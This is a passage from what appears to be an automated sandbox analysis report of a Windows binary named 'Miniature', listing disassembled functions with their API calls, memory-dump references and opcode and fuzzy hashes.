                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C80E99
                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C80ED5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                            • Opcode ID: 8496981b7e083c5918b40d69b5e704c5698496ee6e3e59cccbdb64afd96d10ad
                                                                                                                                                                                                                                                                                            • Instruction ID: f83992bf6978e365df351b24979c36aeeeeb5edd31a7dcc24a7bf762de07b9d5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8496981b7e083c5918b40d69b5e704c5698496ee6e3e59cccbdb64afd96d10ad
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB218D7150030AABDB60AF65DC04B9A77A8BF55328F308A19FDB6E72E0D7709944CB58
                                                                                                                                                                                                                                                                                            Function 00C80F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 00C80F6D
                                                                                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C80FA8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                            • String ID: nul
                                                                                                                                                                                                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                            • Opcode ID: 79873e10af3e83d5cc1c69f88a6dab15faa741e5bf2631103f5faa5a08ebe8e3
                                                                                                                                                                                                                                                                                            • Instruction ID: d035334e05e07a481c7ef9102f4261ef1c97d6b883af6b2ac44944d24a31d46a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79873e10af3e83d5cc1c69f88a6dab15faa741e5bf2631103f5faa5a08ebe8e3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30218B31600305ABDB20AF688C04B9AB7E8BF55738F244A19FDB2E32D0D7709A85DB54
                                                                                                                                                                                                                                                                                            Function 00CA4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C178B1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: GetStockObject.GDI32(00000011), ref: 00C178C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C178CF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CA4BB0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CA4BBD
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CA4BC8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CA4BD7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CA4BE3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                            • Opcode ID: f10bd1948df289742b2b150bfdc710a7e9288ddc68a7c37e461dc4163fece0e6
                                                                                                                                                                                                                                                                                            • Instruction ID: c21baa7db927efee5aa319edf81bba984547f8cf7e4a0facf83c2a66a53134a1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f10bd1948df289742b2b150bfdc710a7e9288ddc68a7c37e461dc4163fece0e6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D1193B214021EBFEF118EA5DC85FEB7F6DEF09758F014111B618A6090CA71DC219BA0
                                                                                                                                                                                                                                                                                            Function 00C4DB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C4DB23: _free.LIBCMT ref: 00C4DB4C
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DBAD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DBB8
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DBC3
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC17
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC22
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC2D
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DC38
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                            • Instruction ID: dc2b8941854caccc77f0ac60a181a4338781484ea4bdb46a58068eb019b77d92
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8711FE72941B04BBDA21BBB0CC4BFCB77DCFF14701F814C29B29BAA252DA75B504A651
                                                                                                                                                                                                                                                                                            Function 00C7E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C7E328
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C7E32F
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C7E345
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000000), ref: 00C7E34C
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C7E390
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 00C7E36D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                            • Opcode ID: c9d602bce8d622963e0ef4167b0717e7cf27c0ab08eb29e465d1586cdd232e42
                                                                                                                                                                                                                                                                                            • Instruction ID: 95dda3de5045580861925645c8c22597b043c96679df21241cb44e0878336f70
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9d602bce8d622963e0ef4167b0717e7cf27c0ab08eb29e465d1586cdd232e42
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9016DF29002087FE711ABA48D89FEE776CDB09308F4085A1B74BE7451EA749E848B75
                                                                                                                                                                                                                                                                                            Function 00C81312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00C81322
                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 00C81334
                                                                                                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C81342
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C81350
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C8135F
                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C8136F
                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 00C81376
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 989465025789de93da86341578e712e19da77599ab8485b9cab9a80aa93c5d02
                                                                                                                                                                                                                                                                                            • Instruction ID: 93010c966cff2e8231244f356de3e9a7458d4970b0d3045db923e039b630d61a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 989465025789de93da86341578e712e19da77599ab8485b9cab9a80aa93c5d02
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0EC32042612BBD7412B54EE49BDABB79FF4631AF441121F20392CB08B749971DF94
                                                                                                                                                                                                                                                                                            Function 00C926BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C9281D
                                                                                                                                                                                                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C9283E
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C9284F
                                                                                                                                                                                                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00C92938
                                                                                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?), ref: 00C928E9
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7433E: _strlen.LIBCMT ref: 00C74348
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00C8F669), ref: 00C93C9D
                                                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 00C92992
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ad0a98fa5aeed1d60460f81b0be15890168bd07a4c77a0f39ccfcad472ab6b59
                                                                                                                                                                                                                                                                                            • Instruction ID: a15966dfc32d602623f981b1e6075954b6493d013f9dcf22f0192a37c1f41d0d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ad0a98fa5aeed1d60460f81b0be15890168bd07a4c77a0f39ccfcad472ab6b59
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1B1F335604300AFD724DF24C889F6AB7E5AF85318F54854CF4A65B2E2DB31EE81DB91
                                                                                                                                                                                                                                                                                            Function 00C40527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C4042A
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C40446
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C4045D
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C4047B
                                                                                                                                                                                                                                                                                            • __allrem.LIBCMT ref: 00C40492
                                                                                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C404B0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                            • Instruction ID: fa8e648b9f334864f555e7feefc47f175d1c021e131460564aea5621764bac8c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26810972A407059BE720AE79CC82B6A77F8BF44324F34412AF721DB692E770DE409794
                                                                                                                                                                                                                                                                                            Function 00C46571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C38649,00C38649,?,?,?,00C467C2,00000001,00000001,8BE85006), ref: 00C465CB
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C467C2,00000001,00000001,8BE85006,?,?,?), ref: 00C46651
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C4674B
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C46758
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C46761
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C46786
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 36b5e9f92bfa94a2a01202ce9613cd329d0f19052442f4bf68b8581e5d96adda
                                                                                                                                                                                                                                                                                            • Instruction ID: 97171e010ae6f5522e528c0ea60123494ea3bdb31e0b412b1eb0a9454acd38ac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 36b5e9f92bfa94a2a01202ce9613cd329d0f19052442f4bf68b8581e5d96adda
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E510272600206AFEB258F60CC81FAF77AAFB82724F150269FC25D6144EB34DD9096A1
                                                                                                                                                                                                                                                                                            Function 00C9C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C9C10E,?,?), ref: 00C9D415
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D451
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4C8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C9D3F8: _wcslen.LIBCMT ref: 00C9D4FE
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9C72A
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C9C785
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9C7CA
                                                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C9C7F9
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C9C853
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9C85F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ac4b6feae3e82aa449c1a73606f8feae711816006648f14c8d868e52770fcdf5
                                                                                                                                                                                                                                                                                            • Instruction ID: f967e6c40c740e5ea882a0c369aee9952e6c777f6f6a6fa57bacca74dbd40972
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac4b6feae3e82aa449c1a73606f8feae711816006648f14c8d868e52770fcdf5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB819D71108241AFCB14DF64C8C5E6ABBE5FF85308F14855CF4564B2A2CB31ED45DB92
                                                                                                                                                                                                                                                                                            Function 00C7009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(00000035), ref: 00C700A9
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C70150
